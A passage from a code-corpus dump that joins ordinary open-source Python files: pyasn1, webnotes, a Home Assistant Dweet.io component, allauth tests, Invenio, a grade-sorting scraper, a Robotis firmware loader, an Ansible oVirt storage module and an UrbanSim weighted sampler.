def __getitem__(self, tagSet):
if tagSet in self.__posMap:
return self.__posMap[tagSet]
elif tagSet in self.__negMap:
raise error.PyAsn1Error('Key in negative map')
elif self.__defType is not None:
return self.__defType
else:
raise KeyError()
def __repr__(self):
s = '%r/%r' % (self.__posMap, self.__negMap)
if self.__defType is not None:
s = s + '/%r' % (self.__defType,)
return s
def clone(self, parentType, tagMap, uniq=False):
if self.__defType is not None and tagMap.getDef() is not None:
raise error.PyAsn1Error('Duplicate default value at %s' % (self,))
if tagMap.getDef() is not None:
defType = tagMap.getDef()
else:
defType = self.__defType
posMap = self.__posMap.copy()
for k in tagMap.getPosMap():
if uniq and k in posMap:
raise error.PyAsn1Error('Duplicate positive key %s' % (k,))
posMap[k] = parentType
negMap = self.__negMap.copy()
negMap.update(tagMap.getNegMap())
return self.__class__(
posMap, negMap, defType,
)
def getPosMap(self): return self.__posMap.copy()
def getNegMap(self): return self.__negMap.copy()
def getDef(self): return self.__defType
| gpl-3.0 |
saurabh6790/med_lib_test | webnotes/modules/__init__.py | 32 | 1699 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Utilities for using modules
"""
import webnotes, os
from webnotes import conf
import webnotes.utils
lower_case_files_for = ['DocType', 'Page', 'Report',
"Workflow", 'Module Def', 'Desktop Item', 'Workflow State', 'Workflow Action']
def scrub(txt):
return txt.replace(' ','_').replace('-', '_').replace('/', '_').lower()
def scrub_dt_dn(dt, dn):
"""Returns in lowercase and code friendly names of doctype and name for certain types"""
ndt, ndn = dt, dn
if dt in lower_case_files_for:
ndt, ndn = scrub(dt), scrub(dn)
return ndt, ndn
def get_module_path(module):
"""Returns path of the given module"""
m = scrub(module)
app_path = webnotes.utils.get_base_path()
if m in ('core', 'website'):
return os.path.join(app_path, 'lib', m)
else:
return os.path.join(app_path, 'app', m)
def get_doc_path(module, doctype, name):
dt, dn = scrub_dt_dn(doctype, name)
return os.path.join(get_module_path(module), dt, dn)
def reload_doc(module, dt=None, dn=None, plugin=None, force=True):
from webnotes.modules.import_file import import_files
return import_files(module, dt, dn, plugin=plugin, force=force)
def export_doc(doctype, name, module=None, plugin=None):
"""write out a doc"""
from webnotes.modules.export_file import write_document_file
import webnotes.model.doc
if not module: module = webnotes.conn.get_value(doctype, name, 'module')
write_document_file(webnotes.model.doc.get(doctype, name), module, plugin=plugin)
def get_doctype_module(doctype):
return webnotes.conn.get_value('DocType', doctype, 'module')
| mit |
Zac-HD/home-assistant | homeassistant/components/dweet.py | 22 | 1948 | """
A component which allows you to send data to Dweet.io.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/dweet/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import (
CONF_NAME, CONF_WHITELIST, EVENT_STATE_CHANGED, STATE_UNKNOWN)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import state as state_helper
from homeassistant.util import Throttle
REQUIREMENTS = ['dweepy==0.2.0']
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'dweet'
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=1)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_WHITELIST, default=[]):
vol.All(cv.ensure_list, [cv.entity_id]),
}),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Setup the Dweet.io component."""
conf = config[DOMAIN]
name = conf.get(CONF_NAME)
whitelist = conf.get(CONF_WHITELIST)
json_body = {}
def dweet_event_listener(event):
"""Listen for new messages on the bus and sends them to Dweet.io."""
state = event.data.get('new_state')
if state is None or state.state in (STATE_UNKNOWN, '') \
or state.entity_id not in whitelist:
return
try:
_state = state_helper.state_as_number(state)
except ValueError:
_state = state.state
json_body[state.attributes.get('friendly_name')] = _state
send_data(name, json_body)
hass.bus.listen(EVENT_STATE_CHANGED, dweet_event_listener)
return True
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def send_data(name, msg):
"""Send the collected data to Dweet.io."""
import dweepy
try:
dweepy.dweet_for(name, msg)
except dweepy.DweepyError:
_LOGGER.error("Error saving data '%s' to Dweet.io", msg)
| apache-2.0 |
okwow123/djangol2 | example/env/lib/python2.7/site-packages/allauth/socialaccount/providers/edmodo/tests.py | 12 | 1147 | from allauth.socialaccount.tests import OAuth2TestsMixin
from allauth.tests import MockedResponse, TestCase
from .provider import EdmodoProvider
class EdmodoTests(OAuth2TestsMixin, TestCase):
provider_id = EdmodoProvider.id
def get_mocked_response(self):
return MockedResponse(200, """
{
"url": "https://api.edmodo.com/users/74721257",
"id": 74721257,
"type": "teacher",
"username": "getacclaim-teacher1",
"user_title": null,
"first_name": "Edmodo Test",
"last_name": "Teacher",
"time_zone": "America/New_York",
"utc_offset": -18000,
"locale": "en",
"gender": null,
"start_level": null,
"end_level": null,
"about": null,
"premium": false,
"school": {"url": "https://api.edmodo.com/schools/559253", "id": 559253},
"verified_institution_member": true,
"coppa_verified": false,
"subjects": null,
"avatars": {
"small":
"https://api.edmodo.com/users/74721257/avatar?type=small&u=670329ncqnf8fxv7tya24byn5",
"large":
"https://api.edmodo.com/users/74721257/avatar?type=large&u=670329ncqnf8fxv7tya24byn5"
},
"email":"test@example.com",
"sync_enabled": false
}
""") # noqa
| mit |
jirikuncar/invenio-deposit | invenio_deposit/fields/author.py | 7 | 1479 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2012, 2013, 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Author field."""
from wtforms import StringField
from ..autocomplete_utils import orcid_authors
from ..field_base import WebDepositField
__all__ = ['AuthorField']
class AuthorField(WebDepositField, StringField):
"""Author form."""
def __init__(self, **kwargs):
"""Deprecated field."""
import warnings
warnings.warn("Field has been deprecated", PendingDeprecationWarning)
defaults = dict(
icon='user',
export_key='authors[0].full_name',
autocomplete=orcid_authors,
widget_classes="form-control"
)
defaults.update(kwargs)
super(AuthorField, self).__init__(**defaults)
| gpl-2.0 |
rusucosmin/courses | ubb/algebra/sort_partial.py | 1 | 2185 | import urllib2
import operator
import os
from bs4 import BeautifulSoup
class Student:
def __init__(self, name, grade):
self._name = name
self._grade = grade
def __repr__(self):
return self._name + " " + str(self._grade)
if not os.path.exists('partial.html'):
response = urllib2.urlopen('https://docs.google.com/spreadsheets/d/1We7B7CbRNWxnR-BrO1t7Dq7J-wDL0MssIBl7tHO-9hc/pubhtml#')
f = open('partial.html', 'w')
f.write(response.read())
with open('partial.html', 'r') as f:
html_doc = f.read()
soup = BeautifulSoup(html_doc, 'html.parser')
div_tag = soup.find_all('div', id = "1864821402")
div_soup = BeautifulSoup(str(div_tag[0].contents), 'html.parser')
empty_cells = div_soup.find_all("td", class_="s5")
for emptycell in empty_cells:
emptycell['class'] = "s4"
empty_cells = div_soup.find_all("td", class_="s3")
for emptycell in empty_cells:
emptycell['class'] = "s2"
empty_cells = div_soup.find_all("td", class_="s10")
for emptycell in empty_cells:
emptycell['class'] = "s2"
empty_cells = div_soup.find_all("td", class_="s11")
for emptycell in empty_cells:
emptycell['class'] = "s4"
all_names = div_soup.find_all("td", class_="s2")
all_grades = div_soup.find_all("td", class_="s4")
all_names = [name for name in all_names if name.getText() != ""]
all_grades = [grade for grade in all_grades if grade.getText() not in ["Pb1", "Pb2", "Pb3", "Pb4", "Total"]]
names = []
grades = []
for i in range(0, len(all_names), 2):
names.append(all_names[i].getText() + " " + all_names[i + 1].getText())
for i in range(4, len(all_grades), 5):
if all_grades[i].getText() == "":
grades.append(0)
else:
grades.append(int(all_grades[i].getText()))
assert(len(grades) == len(names))
students = []
for i in range(min(len(grades), len(names))):
students.append(Student(names[i], grades[i]))
students = sorted(students, key = operator.attrgetter('_grade'), reverse=True)
with open("main.html", 'w') as f:
cnt = 0
for student in students:
cnt += 1
line = str(cnt) + " " + student._name + " " + str(student._grade) + '<br>'
f.write(line.decode('unicode-escape').encode('utf-8'))
f.write('\n')
with open("main.html", 'r') as f:
print(f.read())
| mit |
PeterKietzmann/RIOT | boards/opencm904/dist/robotis-loader.py | 30 | 4057 | #!/usr/bin/env python
'''
MIT License
Copyright (c) 2014 Gregoire Passault
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
# This script sends a program on a robotis board (OpenCM9.04 or CM900)
# using the robotis bootloader (used in OpenCM IDE)
#
# Usage:
# python robotis-loader.py <serial port> <binary>
#
# Example:
# python robotis-loader.py /dev/ttyACM0 firmware.bin
#
# https://github.com/Gregwar/robotis-loader
import serial
import sys
import os
import time
print('~~ Robotis loader ~~')
print('')
print('Please, make sure to connect the USB cable WHILE holding down the "USER SW" button.')
print('Status LED should stay lit and the board should be able to load the program.')
print('')
# Helper function for bytes conversion
if sys.version_info[:1][0] == 3:
def to_ord(val):
return ord(chr(val))
else:
def to_ord(val):
return ord(val)
# Reading command line
if len(sys.argv) != 3:
exit('! Usage: robotis-loader.py <serial-port> <binary>')
pgm, port, binary = sys.argv
def progressBar(percent, precision=65):
"""Prints a progress bar."""
threshold = precision*percent / 100.0
sys.stdout.write('[ ')
for x in range(precision):
if x < threshold:
sys.stdout.write('#')
else:
sys.stdout.write(' ')
sys.stdout.write(' ] ')
sys.stdout.flush()
# Opening the firmware file
try:
stat = os.stat(binary)
size = stat.st_size
firmware = open(binary, 'rb')
print('* Opening %s, size=%d' % (binary, size))
except: # noqa: E722
exit('! Unable to open file %s' % binary)
# Opening serial port
try:
s = serial.Serial(port, baudrate=115200)
except: # noqa: E722
exit('! Unable to open serial port %s' % port)
print('* Resetting the board')
s.setRTS(True)
s.setDTR(False)
time.sleep(0.1)
s.setRTS(False)
s.write(b'CM9X')
s.close()
time.sleep(1.0)
print('* Connecting...')
s = serial.Serial(port, baudrate=115200)
s.write(b'AT&LD')
print('* Download signal transmitted, waiting...')
# Entering bootloader sequence
while True:
line = s.readline().strip()
if line.endswith(b'Ready..'):
print('* Board ready, sending data')
cs = 0
pos = 0
while True:
c = firmware.read(2048)
if len(c):
pos += len(c)
sys.stdout.write("\r")
progressBar(100 * float(pos) / float(size))
s.write(c)
for k in range(0, len(c)):
cs = (cs + to_ord(c[k])) % 256
else:
firmware.close()
break
print('')
s.setDTR(True)
print('* Checksum: %d' % (cs))
import struct
s.write(struct.pack('B', cs))
# s.write('{0}'.format(chr(cs)).encode('ascii'))
print('* Firmware was sent')
else:
if line == b'Success..':
print('* Success, running the code')
print('')
s.write(b'AT&RST')
s.close()
exit()
else:
print('Board -> {}'.format(line))
| lgpl-2.1 |
fernandezcuesta/ansible | lib/ansible/modules/cloud/ovirt/ovirt_storage_domains.py | 29 | 18519 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovirt_storage_domains
short_description: Module to manage storage domains in oVirt/RHV
version_added: "2.3"
author: "Ondra Machacek (@machacekondra)"
description:
- "Module to manage storage domains in oVirt/RHV"
options:
name:
description:
- "Name of the storage domain to manage."
state:
description:
- "Should the storage domain be present/absent/maintenance/unattached"
choices: ['present', 'absent', 'maintenance', 'unattached']
default: present
description:
description:
- "Description of the storage domain."
comment:
description:
- "Comment of the storage domain."
data_center:
description:
- "Data center name where storage domain should be attached."
- "This parameter isn't idempotent, it's not possible to change data center of storage domain."
domain_function:
description:
- "Function of the storage domain."
- "This parameter isn't idempotent, it's not possible to change domain function of storage domain."
choices: ['data', 'iso', 'export']
default: 'data'
aliases: ['type']
host:
description:
- "Host to be used to mount storage."
localfs:
description:
- "Dictionary with values for localfs storage type:"
- "C(path) - Path of the mount point. E.g.: /path/to/my/data"
- "Note that these parameters are not idempotent."
version_added: "2.4"
nfs:
description:
- "Dictionary with values for NFS storage type:"
- "C(address) - Address of the NFS server. E.g.: myserver.mydomain.com"
- "C(path) - Path of the mount point. E.g.: /path/to/my/data"
- "C(version) - NFS version. One of: I(auto), I(v3), I(v4) or I(v4_1)."
- "C(timeout) - The time in tenths of a second to wait for a response before retrying NFS requests. Range 0 to 65535."
- "C(retrans) - The number of times to retry a request before attempting further recovery actions. Range 0 to 65535."
- "Note that these parameters are not idempotent."
iscsi:
description:
- "Dictionary with values for iSCSI storage type:"
- "C(address) - Address of the iSCSI storage server."
- "C(port) - Port of the iSCSI storage server."
- "C(target) - The target IQN for the storage device."
- "C(lun_id) - LUN id(s)."
- "C(username) - A CHAP user name for logging into a target."
- "C(password) - A CHAP password for logging into a target."
- "C(override_luns) - If I(True) ISCSI storage domain luns will be overridden before adding."
- "Note that these parameters are not idempotent."
posixfs:
description:
- "Dictionary with values for PosixFS storage type:"
- "C(path) - Path of the mount point. E.g.: /path/to/my/data"
- "C(vfs_type) - Virtual File System type."
- "C(mount_options) - Option which will be passed when mounting storage."
- "Note that these parameters are not idempotent."
glusterfs:
description:
- "Dictionary with values for GlusterFS storage type:"
- "C(address) - Address of the Gluster server. E.g.: myserver.mydomain.com"
- "C(path) - Path of the mount point. E.g.: /path/to/my/data"
- "C(mount_options) - Option which will be passed when mounting storage."
- "Note that these parameters are not idempotent."
fcp:
description:
- "Dictionary with values for fibre channel storage type:"
- "C(address) - Address of the fibre channel storage server."
- "C(port) - Port of the fibre channel storage server."
- "C(lun_id) - LUN id."
- "Note that these parameters are not idempotent."
destroy:
description:
- "Logical remove of the storage domain. If I(true) retains the storage domain's data for import."
- "This parameter is relevant only when C(state) is I(absent)."
format:
description:
- "If I(True) storage domain will be formatted after removing it from oVirt/RHV."
- "This parameter is relevant only when C(state) is I(absent)."
extends_documentation_fragment: ovirt
'''
EXAMPLES = '''
# Examples don't contain auth parameter for simplicity,
# look at ovirt_auth module to see how to reuse authentication:
# Add data NFS storage domain
- ovirt_storage_domains:
name: data_nfs
host: myhost
data_center: mydatacenter
nfs:
address: 10.34.63.199
path: /path/data
# Add data localfs storage domain
- ovirt_storage_domains:
name: data_localfs
host: myhost
data_center: mydatacenter
localfs:
path: /path/to/data
# Add data iSCSI storage domain:
- ovirt_storage_domains:
name: data_iscsi
host: myhost
data_center: mydatacenter
iscsi:
target: iqn.2016-08-09.domain-01:nickname
lun_id:
- 1IET_000d0001
- 1IET_000d0002
address: 10.34.63.204
# Add data glusterfs storage domain
- ovirt_storage_domains:
name: glusterfs_1
host: myhost
data_center: mydatacenter
glusterfs:
address: 10.10.10.10
path: /path/data
# Import export NFS storage domain:
- ovirt_storage_domains:
domain_function: export
host: myhost
data_center: mydatacenter
nfs:
address: 10.34.63.199
path: /path/export
# Create ISO NFS storage domain
- ovirt_storage_domains:
name: myiso
domain_function: iso
host: myhost
data_center: mydatacenter
nfs:
address: 10.34.63.199
path: /path/iso
# Remove storage domain
- ovirt_storage_domains:
state: absent
name: mystorage_domain
format: true
'''
RETURN = '''
id:
description: ID of the storage domain which is managed
returned: On success if storage domain is found.
type: str
sample: 7de90f31-222c-436c-a1ca-7e655bd5b60c
storage_domain:
description: "Dictionary of all the storage domain attributes. Storage domain attributes can be found on your oVirt/RHV instance
at following url: http://ovirt.github.io/ovirt-engine-api-model/master/#types/storage_domain."
returned: On success if storage domain is found.
type: dict
'''
try:
import ovirtsdk4.types as otypes
from ovirtsdk4.types import StorageDomainStatus as sdstate
except ImportError:
pass
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ovirt import (
BaseModule,
check_sdk,
create_connection,
equal,
get_entity,
ovirt_full_argument_spec,
search_by_name,
wait,
)
class StorageDomainModule(BaseModule):
def _get_storage_type(self):
for sd_type in ['nfs', 'iscsi', 'posixfs', 'glusterfs', 'fcp', 'localfs']:
if self._module.params.get(sd_type) is not None:
return sd_type
def _get_storage(self):
for sd_type in ['nfs', 'iscsi', 'posixfs', 'glusterfs', 'fcp', 'localfs']:
if self._module.params.get(sd_type) is not None:
return self._module.params.get(sd_type)
def _login(self, storage_type, storage):
if storage_type == 'iscsi':
hosts_service = self._connection.system_service().hosts_service()
host = search_by_name(hosts_service, self._module.params['host'])
hosts_service.host_service(host.id).iscsi_login(
iscsi=otypes.IscsiDetails(
username=storage.get('username'),
password=storage.get('password'),
address=storage.get('address'),
target=storage.get('target'),
),
)
def build_entity(self):
storage_type = self._get_storage_type()
storage = self._get_storage()
self._login(storage_type, storage)
return otypes.StorageDomain(
name=self._module.params['name'],
description=self._module.params['description'],
comment=self._module.params['comment'],
type=otypes.StorageDomainType(
self._module.params['domain_function']
),
host=otypes.Host(
name=self._module.params['host'],
),
storage=otypes.HostStorage(
type=otypes.StorageType(storage_type),
logical_units=[
otypes.LogicalUnit(
id=lun_id,
address=storage.get('address'),
port=storage.get('port', 3260),
target=storage.get('target'),
username=storage.get('username'),
password=storage.get('password'),
) for lun_id in (
storage.get('lun_id')
if isinstance(storage.get('lun_id'), list)
else [storage.get('lun_id')]
)
] if storage_type in ['iscsi', 'fcp'] else None,
override_luns=storage.get('override_luns'),
mount_options=storage.get('mount_options'),
vfs_type='glusterfs' if storage_type in ['glusterfs'] else storage.get('vfs_type'),
address=storage.get('address'),
path=storage.get('path'),
nfs_retrans=storage.get('retrans'),
nfs_timeo=storage.get('timeout'),
nfs_version=otypes.NfsVersion(
storage.get('version')
) if storage.get('version') else None,
) if storage_type is not None else None
)
def _attached_sds_service(self):
# Get data center object of the storage domain:
dcs_service = self._connection.system_service().data_centers_service()
dc = search_by_name(dcs_service, self._module.params['data_center'])
if dc is None:
return
dc_service = dcs_service.data_center_service(dc.id)
return dc_service.storage_domains_service()
def _maintenance(self, storage_domain):
attached_sds_service = self._attached_sds_service()
if attached_sds_service is None:
return
attached_sd_service = attached_sds_service.storage_domain_service(storage_domain.id)
attached_sd = get_entity(attached_sd_service)
if attached_sd and attached_sd.status != sdstate.MAINTENANCE:
if not self._module.check_mode:
attached_sd_service.deactivate()
self.changed = True
wait(
service=attached_sd_service,
condition=lambda sd: sd.status == sdstate.MAINTENANCE,
wait=self._module.params['wait'],
timeout=self._module.params['timeout'],
)
def _unattach(self, storage_domain):
attached_sds_service = self._attached_sds_service()
if attached_sds_service is None:
return
attached_sd_service = attached_sds_service.storage_domain_service(storage_domain.id)
attached_sd = get_entity(attached_sd_service)
if attached_sd and attached_sd.status == sdstate.MAINTENANCE:
if not self._module.check_mode:
# Detach the storage domain:
attached_sd_service.remove()
self.changed = True
# Wait until storage domain is detached:
wait(
service=attached_sd_service,
condition=lambda sd: sd is None,
wait=self._module.params['wait'],
timeout=self._module.params['timeout'],
)
def pre_remove(self, storage_domain):
# Before removing storage domain we need to put it into maintenance state:
self._maintenance(storage_domain)
# Before removing storage domain we need to detach it from data center:
self._unattach(storage_domain)
def post_create_check(self, sd_id):
storage_domain = self._service.service(sd_id).get()
self._service = self._attached_sds_service()
# If storage domain isn't attached, attach it:
attached_sd_service = self._service.service(storage_domain.id)
if get_entity(attached_sd_service) is None:
self._service.add(
otypes.StorageDomain(
id=storage_domain.id,
),
)
self.changed = True
# Wait until storage domain is in maintenance:
wait(
service=attached_sd_service,
condition=lambda sd: sd.status == sdstate.ACTIVE,
wait=self._module.params['wait'],
timeout=self._module.params['timeout'],
)
def unattached_pre_action(self, storage_domain):
self._service = self._attached_sds_service(storage_domain)
self._maintenance(self._service, storage_domain)
def update_check(self, entity):
return (
equal(self._module.params['comment'], entity.comment) and
equal(self._module.params['description'], entity.description)
)
def failed_state(sd):
return sd.status in [sdstate.UNKNOWN, sdstate.INACTIVE]
def control_state(sd_module):
sd = sd_module.search_entity()
if sd is None:
return
sd_service = sd_module._service.service(sd.id)
if sd.status == sdstate.LOCKED:
wait(
service=sd_service,
condition=lambda sd: sd.status != sdstate.LOCKED,
fail_condition=failed_state,
)
if failed_state(sd):
raise Exception("Not possible to manage storage domain '%s'." % sd.name)
elif sd.status == sdstate.ACTIVATING:
wait(
service=sd_service,
condition=lambda sd: sd.status == sdstate.ACTIVE,
fail_condition=failed_state,
)
elif sd.status == sdstate.DETACHING:
wait(
service=sd_service,
condition=lambda sd: sd.status == sdstate.UNATTACHED,
fail_condition=failed_state,
)
elif sd.status == sdstate.PREPARING_FOR_MAINTENANCE:
wait(
service=sd_service,
condition=lambda sd: sd.status == sdstate.MAINTENANCE,
fail_condition=failed_state,
)
def main():
argument_spec = ovirt_full_argument_spec(
state=dict(
choices=['present', 'absent', 'maintenance', 'unattached'],
default='present',
),
name=dict(required=True),
description=dict(default=None),
comment=dict(default=None),
data_center=dict(required=True),
domain_function=dict(choices=['data', 'iso', 'export'], default='data', aliases=['type']),
host=dict(default=None),
localfs=dict(default=None, type='dict'),
nfs=dict(default=None, type='dict'),
iscsi=dict(default=None, type='dict'),
posixfs=dict(default=None, type='dict'),
glusterfs=dict(default=None, type='dict'),
fcp=dict(default=None, type='dict'),
destroy=dict(type='bool', default=False),
format=dict(type='bool', default=False),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
check_sdk(module)
try:
auth = module.params.pop('auth')
connection = create_connection(auth)
storage_domains_service = connection.system_service().storage_domains_service()
storage_domains_module = StorageDomainModule(
connection=connection,
module=module,
service=storage_domains_service,
)
state = module.params['state']
control_state(storage_domains_module)
if state == 'absent':
ret = storage_domains_module.remove(
destroy=module.params['destroy'],
format=module.params['format'],
host=module.params['host'],
)
elif state == 'present':
sd_id = storage_domains_module.create()['id']
storage_domains_module.post_create_check(sd_id)
ret = storage_domains_module.action(
action='activate',
action_condition=lambda s: s.status == sdstate.MAINTENANCE,
wait_condition=lambda s: s.status == sdstate.ACTIVE,
fail_condition=failed_state,
)
elif state == 'maintenance':
sd_id = storage_domains_module.create()['id']
storage_domains_module.post_create_check(sd_id)
ret = storage_domains_module.action(
action='deactivate',
action_condition=lambda s: s.status == sdstate.ACTIVE,
wait_condition=lambda s: s.status == sdstate.MAINTENANCE,
fail_condition=failed_state,
)
elif state == 'unattached':
ret = storage_domains_module.create()
storage_domains_module.pre_remove(
storage_domain=storage_domains_service.service(ret['id']).get()
)
ret['changed'] = storage_domains_module.changed
module.exit_json(**ret)
except Exception as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
finally:
connection.close(logout=auth.get('token') is None)
if __name__ == "__main__":
main()
| gpl-3.0 |
t794104/ansible | test/units/module_utils/basic/test_dict_converters.py | 166 | 1032 | # -*- coding: utf-8 -*-
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
# (c) 2016 Toshio Kuratomi <tkuratomi@ansible.com>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from units.mock.procenv import ModuleTestCase
from ansible.module_utils.six.moves import builtins
realimport = builtins.__import__
class TestTextifyContainers(ModuleTestCase):
def test_module_utils_basic_json_dict_converters(self):
from ansible.module_utils.basic import json_dict_unicode_to_bytes, json_dict_bytes_to_unicode
test_data = dict(
item1=u"Fóo",
item2=[u"Bár", u"Bam"],
item3=dict(sub1=u"Súb"),
item4=(u"föo", u"bär", u"©"),
item5=42,
)
res = json_dict_unicode_to_bytes(test_data)
res2 = json_dict_bytes_to_unicode(res)
self.assertEqual(test_data, res2)
| gpl-3.0 |
iut-ibk/DynaMind-UrbanSim | 3rdparty/opus/src/opus_core/samplers/weighted_sampler.py | 2 | 14239 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
from opus_core.resources import Resources
from opus_core.session_configuration import SessionConfiguration
from opus_core.datasets.dataset_pool import DatasetPool
from numpy import where, arange, take, ones, newaxis, ndarray, zeros, concatenate, resize
from numpy import searchsorted, column_stack
from opus_core.samplers.constants import UNPLACED_ID
from opus_core.sampling_toolbox import prob2dsample, probsample_noreplace, normalize
from opus_core.sampling_toolbox import nonzerocounts
from opus_core.misc import lookup
from opus_core.logger import logger
from opus_core.sampler import Sampler
from opus_core.datasets.interaction_dataset import InteractionDataset
from opus_core.variables.variable_name import VariableName
class weighted_sampler(Sampler):
def run(self, dataset1, dataset2, index1=None, index2=None, sample_size=10, weight=None,
include_chosen_choice=False, with_replacement=False, resources=None, dataset_pool=None):
"""this function samples number of sample_size (scalar value) alternatives from dataset2
for agent set specified by dataset1.
If index1 is not None, only samples alterantives for agents with indices in index1;
if index2 is not None, only samples alternatives from indices in index2.
sample_size specifies number of alternatives to be sampled for each agent.
weight, to be used as sampling weight, is either an attribute name of dataset2, or a 1d
array of the same length as index2 or 2d array of shape (index1.size, index2.size).
Also refer to document of interaction_dataset"""
if dataset_pool is None:
try:
sc = SessionConfiguration()
dataset_pool=sc.get_dataset_pool()
except:
dataset_pool = DatasetPool()
local_resources = Resources(resources)
local_resources.merge_if_not_None(
{"dataset1": dataset1, "dataset2": dataset2,
"index1":index1, "index2": index2,
"sample_size": sample_size, "weight": weight,
"with_replacement": with_replacement,
"include_chosen_choice": include_chosen_choice})
local_resources.check_obligatory_keys(['dataset1', 'dataset2', 'sample_size'])
agent = local_resources["dataset1"]
index1 = local_resources.get("index1", None)
if index1 is None:
index1 = arange(agent.size())
choice = local_resources["dataset2"]
index2 = local_resources.get("index2", None)
if index2 is None:
index2 = arange(choice.size())
if index1.size == 0 or index2.size == 0:
err_msg = "either choice size or agent size is zero, return None"
logger.log_warning(err_msg)
return None
include_chosen_choice = local_resources.get("include_chosen_choice", False)
J = local_resources["sample_size"]
if include_chosen_choice:
J = J - 1
with_replacement = local_resources.get("with_replacement")
weight = local_resources.get("weight", None)
if isinstance(weight, str):
if weight in choice.get_known_attribute_names():
weight=choice.get_attribute(weight)
rank_of_weight = 1
elif VariableName(weight).get_dataset_name() == choice.get_dataset_name():
weight=choice.compute_variables(weight, dataset_pool=dataset_pool)
rank_of_weight = 1
else:
## weights can be an interaction variable
interaction_dataset = InteractionDataset(local_resources)
weight=interaction_dataset.compute_variables(weight, dataset_pool=dataset_pool)
rank_of_weight = 2
elif isinstance(weight, ndarray):
rank_of_weight = weight.ndim
elif not weight: ## weight is None or empty string
weight = ones(index2.size)
rank_of_weight = 1
else:
err_msg = "unkown weight type"
logger.log_error(err_msg)
raise TypeError, err_msg
if (weight.size <> index2.size) and (weight.shape[rank_of_weight-1] <> index2.size):
if weight.shape[rank_of_weight-1] == choice.size():
if rank_of_weight == 1:
weight = take(weight, index2)
if rank_of_weight == 2:
weight = take(weight, index2, axis=1)
else:
err_msg = "weight array size doesn't match to size of dataset2 or its index"
logger.log_error(err_msg)
raise ValueError, err_msg
prob = normalize(weight)
#chosen_choice = ones(index1.size) * UNPLACED_ID
chosen_choice_id = agent.get_attribute(choice.get_id_name()[0])[index1]
#index_of_placed_agent = where(greater(chosen_choice_id, UNPLACED_ID))[0]
chosen_choice_index = choice.try_get_id_index(chosen_choice_id, return_value_if_not_found=UNPLACED_ID)
chosen_choice_index_to_index2 = lookup(chosen_choice_index, index2, index_if_not_found=UNPLACED_ID)
if rank_of_weight == 1: # if weight_array is 1d, then each agent shares the same weight for choices
replace = with_replacement # sampling with no replacement
if nonzerocounts(weight) < J:
logger.log_warning("weight array dosen't have enough non-zero counts, use sample with replacement")
replace = True
sampled_index = prob2dsample( index2, sample_size=(index1.size, J),
prob_array=prob, exclude_index=chosen_choice_index_to_index2,
replace=replace, return_index=True )
#return index2[sampled_index]
if rank_of_weight == 2:
sampled_index = zeros((index1.size,J), dtype="int32") - 1
for i in range(index1.size):
replace = with_replacement # sampling with/without replacement
i_prob = prob[i,:]
if nonzerocounts(i_prob) < J:
logger.log_warning("weight array dosen't have enough non-zero counts, use sample with replacement")
replace = True
#exclude_index passed to probsample_noreplace needs to be indexed to index2
sampled_index[i,:] = probsample_noreplace( index2, sample_size=J, prob_array=i_prob,
exclude_index=chosen_choice_index_to_index2[i],
return_index=True )
sampling_prob = take(prob, sampled_index)
